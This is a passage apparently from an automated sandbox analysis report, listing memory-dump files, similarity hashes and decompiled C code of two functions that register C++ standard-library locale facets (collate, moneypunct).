Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 49ef3f7939af933b9f45587e5b48566a3b506f17f71705eaac13e3b5f31d0469
Instruction ID: fc57140990ea0202da84e4f65ebf44c77a17b3a9f06320308032cc42259a1d29
Opcode Fuzzy Hash: 49ef3f7939af933b9f45587e5b48566a3b506f17f71705eaac13e3b5f31d0469
Instruction Fuzzy Hash: A31123358082169BCF05EB60C840EEDB774AF90354F2A000CD612A7382DB70DD0087D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t374 - 0x14, 0);
				_t357 =  *0x6d546e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6D46161C(0x6d546e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6D4866BA(_t374 - 0x14);
					return E6D4A0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6D49BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t374 - 0x20);
							E6D4A3D74(_t374 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t348, _t357, 0x14);
							E6D486653(_t374 - 0x14, 0);
							_t358 =  *0x6d546e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6D46161C(0x6d546e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6D4866BA(_t374 - 0x14);
								return E6D4A0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6D49BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t374 - 0x20);
										E6D4A3D74(_t374 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t265, _t349, _t358, 0x14);
										E6D486653(_t374 - 0x14, 0);
										_t359 =  *0x6d546e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6D46161C(0x6d546e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6D4866BA(_t374 - 0x14);
											return E6D4A0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6D49C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t374 - 0x20);
													E6D4A3D74(_t374 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t265, _t350, _t359, 0x14);
													E6D486653(_t374 - 0x14, 0);
													_t360 =  *0x6d546e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6D46161C(0x6d546e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6D4866BA(_t374 - 0x14);
														return E6D4A0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6D49C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t374 - 0x20);
																E6D4A3D74(_t374 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t265, _t351, _t360, 0x14);
																E6D486653(_t374 - 0x14, 0);
																_t361 =  *0x6d546e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6D46161C(0x6d546e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6D4866BA(_t374 - 0x14);
																	return E6D4A0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6D49C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t374 - 0x20);
																			E6D4A3D74(_t374 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t265, _t352, _t361, 0x14);
																			E6D486653(_t374 - 0x14, 0);
																			_t362 =  *0x6d546e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6D46161C(0x6d546e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6D4866BA(_t374 - 0x14);
																				return E6D4A0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6D49C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t374 - 0x20);
																						E6D4A3D74(_t374 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t265, _t353, _t362, 0x14);
																						E6D486653(_t374 - 0x14, 0);
																						_t363 =  *0x6d546e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6D46161C(0x6d546e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6D4866BA(_t374 - 0x14);
																							return E6D4A0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6D49C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t374 - 0x20);
																									E6D4A3D74(_t374 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t265, _t354, _t363, 0x14);
																									E6D486653(_t374 - 0x14, 0);
																									_t364 =  *0x6d546e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6D46161C(0x6d546e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6D46171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6D4866BA(_t374 - 0x14);
																										return E6D4A0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6D49C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6D461438(_t321);
																												E6D4A3D74(_t374 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6d4ec414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6D49D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6D4A0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6D486FD3(__eflags, _t355);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6d546e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6D486FD3(__eflags, _t354);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6d546e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6D486FD3(__eflags, _t353);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6d546e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6D486FD3(__eflags, _t352);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6d546e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6D486FD3(__eflags, _t351);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6d546e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6D486FD3(__eflags, _t350);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6d546e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6D486FD3(__eflags, _t349);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6d546e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6D486FD3(__eflags, _t348);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6d546e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6d49b74c
0x6d49b74c
0x6d49b753
0x6d49b75d
0x6d49b762
0x6d49b76d
0x6d49b771
0x6d49b774
0x6d49b779
0x6d49b77d
0x6d49b782
0x6d49b786
0x6d49b7cb
0x6d49b7ce
0x6d49b7da
0x6d49b788
0x6d49b78a
0x6d49b790
0x6d49b796
0x6d49b79e
0x6d49b7a1
0x6d49b7de
0x6d49b7ec
0x6d49b7f1
0x6d49b7f9
0x6d49b803
0x6d49b808
0x6d49b813
0x6d49b817
0x6d49b81a
0x6d49b81f
0x6d49b828
0x6d49b82a
0x6d49b82c
0x6d49b871
0x6d49b874
0x6d49b880
0x6d49b82e
0x6d49b82e
0x6d49b830
0x6d49b836
0x6d49b83c
0x6d49b844
0x6d49b847
0x6d49b884
0x6d49b892
0x6d49b897
0x6d49b89f
0x6d49b8a9
0x6d49b8ae
0x6d49b8b9
0x6d49b8bd
0x6d49b8c0
0x6d49b8c5
0x6d49b8ce
0x6d49b8d0
0x6d49b8d2
0x6d49b917
0x6d49b91a
0x6d49b926
0x6d49b8d4
0x6d49b8d4
0x6d49b8d6
0x6d49b8dc
0x6d49b8e2
0x6d49b8ea
0x6d49b8ed
0x6d49b92a
0x6d49b938
0x6d49b93d
0x6d49b945
0x6d49b94f
0x6d49b954
0x6d49b95f
0x6d49b963
0x6d49b966
0x6d49b96b
0x6d49b974
0x6d49b976
0x6d49b978
0x6d49b9bd
0x6d49b9c0
0x6d49b9cc
0x6d49b97a
0x6d49b97a
0x6d49b97c
0x6d49b982
0x6d49b988
0x6d49b990
0x6d49b993
0x6d49b9d0
0x6d49b9de
0x6d49b9e3
0x6d49b9eb
0x6d49b9f5
0x6d49b9fa
0x6d49ba05
0x6d49ba09
0x6d49ba0c
0x6d49ba11
0x6d49ba1a
0x6d49ba1c
0x6d49ba1e
0x6d49ba63
0x6d49ba66
0x6d49ba72
0x6d49ba20
0x6d49ba20
0x6d49ba22
0x6d49ba28
0x6d49ba2e
0x6d49ba36
0x6d49ba39
0x6d49ba76
0x6d49ba84
0x6d49ba89
0x6d49ba91
0x6d49ba9b
0x6d49baa0
0x6d49baab
0x6d49baaf
0x6d49bab2
0x6d49bab7
0x6d49bac0
0x6d49bac2
0x6d49bac4
0x6d49bb09
0x6d49bb0c
0x6d49bb18
0x6d49bac6
0x6d49bac6
0x6d49bac8
0x6d49bace
0x6d49bad4
0x6d49badc
0x6d49badf
0x6d49bb1c
0x6d49bb2a
0x6d49bb2f
0x6d49bb37
0x6d49bb41
0x6d49bb46
0x6d49bb51
0x6d49bb55
0x6d49bb58
0x6d49bb5d
0x6d49bb66
0x6d49bb68
0x6d49bb6a
0x6d49bbaf
0x6d49bbb2
0x6d49bbbe
0x6d49bb6c
0x6d49bb6c
0x6d49bb6e
0x6d49bb74
0x6d49bb7a
0x6d49bb82
0x6d49bb85
0x6d49bbc2
0x6d49bbd0
0x6d49bbd5
0x6d49bbdd
0x6d49bbe7
0x6d49bbec
0x6d49bbf7
0x6d49bbfb
0x6d49bbfe
0x6d49bc03
0x6d49bc0c
0x6d49bc0e
0x6d49bc10
0x6d49bc55
0x6d49bc58
0x6d49bc64
0x6d49bc12
0x6d49bc12
0x6d49bc14
0x6d49bc1a
0x6d49bc20
0x6d49bc28
0x6d49bc2b
0x6d49bc65
0x6d49bc68
0x6d49bc76
0x6d49bc7b
0x6d49bc83
0x6d49bc88
0x6d49bc8a
0x6d49bc90
0x6d49bc93
0x6d49bc9c
0x6d49bc9c
0x6d49bc9c
0x6d49bca0
0x6d49bca6
0x6d49bca9
0x6d49bcb5
0x6d49bc2d
0x6d49bc2d
0x6d49bc30
0x6d49bc34
0x6d49bc38
0x6d49bc45
0x6d49bc4d
0x6d49bc4f
0x00000000
0x6d49bc4f
0x6d49bc16
0x6d49bc16
0x00000000
0x6d49bc16
0x6d49bc14
0x6d49bb87
0x6d49bb87
0x6d49bb8a
0x6d49bb8e
0x6d49bb92
0x6d49bb9f
0x6d49bba7
0x6d49bba9
0x00000000
0x6d49bba9
0x6d49bb70
0x6d49bb70
0x00000000
0x6d49bb70
0x6d49bb6e
0x6d49bae1
0x6d49bae1
0x6d49bae4
0x6d49bae8
0x6d49baec
0x6d49baf9
0x6d49bb01
0x6d49bb03
0x00000000
0x6d49bb03
0x6d49baca
0x6d49baca
0x00000000
0x6d49baca
0x6d49bac8
0x6d49ba3b
0x6d49ba3b
0x6d49ba3e
0x6d49ba42
0x6d49ba46
0x6d49ba53
0x6d49ba5b
0x6d49ba5d
0x00000000
0x6d49ba5d
0x6d49ba24
0x6d49ba24
0x00000000
0x6d49ba24
0x6d49ba22
0x6d49b995
0x6d49b995
0x6d49b998
0x6d49b99c
0x6d49b9a0
0x6d49b9ad
0x6d49b9b5
0x6d49b9b7
0x00000000
0x6d49b9b7
0x6d49b97e
0x6d49b97e
0x00000000
0x6d49b97e
0x6d49b97c
0x6d49b8ef
0x6d49b8ef
0x6d49b8f2
0x6d49b8f6
0x6d49b8fa
0x6d49b907
0x6d49b90f
0x6d49b911
0x00000000
0x6d49b911
0x6d49b8d8
0x6d49b8d8
0x00000000
0x6d49b8d8
0x6d49b8d6
0x6d49b849
0x6d49b849
0x6d49b84c
0x6d49b850
0x6d49b854
0x6d49b861
0x6d49b869
0x6d49b86b
0x00000000
0x6d49b86b
0x6d49b832
0x6d49b832
0x00000000
0x6d49b832
0x6d49b830
0x6d49b7a3
0x6d49b7a3
0x6d49b7a6
0x6d49b7aa
0x6d49b7ae
0x6d49b7bb
0x6d49b7c3
0x6d49b7c5
0x00000000
0x6d49b7c5
0x6d49b78c
0x6d49b78c
0x00000000
0x6d49b78c
0x6d49b78a

APIs

__EH_prolog3.LIBCMT ref: 6D49B753
std::_Lockit::_Lockit.LIBCPMT ref: 6D49B75D
int.LIBCPMT ref: 6D49B774

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

collate.LIBCPMT ref: 6D49B797
std::_Facet_Register.LIBCPMT ref: 6D49B7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D49B7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D49B7EC

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: f4b17ddb62fc5118fad6481cb4514515559a233d4ccb54783bf0e60cdb5878a2
Instruction ID: 39923b3018d07ab18c7de53b7cd2f0490ee351f98b6dfcc59feef0ada1d8220b
Opcode Fuzzy Hash: f4b17ddb62fc5118fad6481cb4514515559a233d4ccb54783bf0e60cdb5878a2
Instruction Fuzzy Hash: 351106768081199BCF05EB60C880FEEBBB5AF94314F2A414CE611BB390DB70DD018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D49B7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D49B7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t330 - 0x14, 0);
				_t315 =  *0x6d546e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6D46161C(0x6d546e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6D4866BA(_t330 - 0x14);
					return E6D4A0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6D49BFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t330 - 0x20);
							E6D4A3D74(_t330 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t307, _t315, 0x14);
							E6D486653(_t330 - 0x14, 0);
							_t316 =  *0x6d546e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6D46161C(0x6d546e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6D4866BA(_t330 - 0x14);
								return E6D4A0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6D49C050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t330 - 0x20);
										E6D4A3D74(_t330 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t234, _t308, _t316, 0x14);
										E6D486653(_t330 - 0x14, 0);
										_t317 =  *0x6d546e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6D46161C(0x6d546e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6D4866BA(_t330 - 0x14);
											return E6D4A0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6D49C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t330 - 0x20);
													E6D4A3D74(_t330 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t234, _t309, _t317, 0x14);
													E6D486653(_t330 - 0x14, 0);
													_t318 =  *0x6d546e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6D46161C(0x6d546e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6D4866BA(_t330 - 0x14);
														return E6D4A0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6D49C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t330 - 0x20);
																E6D4A3D74(_t330 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t234, _t310, _t318, 0x14);
																E6D486653(_t330 - 0x14, 0);
																_t319 =  *0x6d546e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6D46161C(0x6d546e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6D4866BA(_t330 - 0x14);
																	return E6D4A0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6D49C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t330 - 0x20);
																			E6D4A3D74(_t330 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t234, _t311, _t319, 0x14);
																			E6D486653(_t330 - 0x14, 0);
																			_t320 =  *0x6d546e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6D46161C(0x6d546e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6D4866BA(_t330 - 0x14);
																				return E6D4A0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6D49C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t330 - 0x20);
																						E6D4A3D74(_t330 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t234, _t312, _t320, 0x14);
																						E6D486653(_t330 - 0x14, 0);
																						_t321 =  *0x6d546e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6D46161C(0x6d546e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6D46171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6D4866BA(_t330 - 0x14);
																							return E6D4A0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6D49C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6D461438(_t283);
																									E6D4A3D74(_t330 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6d4ec414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6D49D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6D4A0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6D486FD3(__eflags, _t313);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6d546e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6D486FD3(__eflags, _t312);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6d546e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6D486FD3(__eflags, _t311);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6d546e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6D486FD3(__eflags, _t310);
																 *0x6d4ea26c();
